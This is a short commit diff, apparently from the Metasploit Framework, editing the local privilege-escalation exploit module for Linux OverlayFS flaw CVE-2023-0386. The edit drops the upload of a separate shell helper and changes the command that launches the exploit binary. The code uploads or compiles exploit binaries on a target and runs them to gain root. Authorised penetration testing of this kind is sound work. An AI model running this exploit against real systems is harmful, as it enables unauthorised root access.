Apply suggestions from code review

Takahiro-Yoko · bwatters-r7 · web-flow · commit 130f14681944 · 2024-09-24T08:06:26.000+09:00
Change to call setgid and setuid in the exploit before executing the payload

Co-authored-by: Brendan &lt;bwatters@rapid7.com&gt;
diff --git a/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb b/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
@@ -116,11 +116,9 @@ def exploit
     if live_compile?
       vprint_status('Live compiling exploit on system...')
       upload_and_compile(exploit_path, exploit_source('CVE-2023-0386', 'cve_2023_0386.c'), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
-      upload_and_compile(shell_path, exploit_source('CVE-2023-0386', 'shell.c'))
     else
       vprint_status('Dropping pre-compiled exploit on system...')
       upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
-      upload_and_chmodx(shell_path, exploit_data('CVE-2023-0386', 'shell.x64.elf'))
     end
 
     # Upload payload executable
@@ -129,7 +127,7 @@ def exploit
 
     # Launch exploit
     print_status('Launching exploit...')
-    cmd_string = "echo '#{payload_path} & exit' | #{exploit_path} #{shell_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    cmd_string = "#{exploit_path} #{shell_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
     vprint_status("Running: #{cmd_string}")
     begin
       output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])
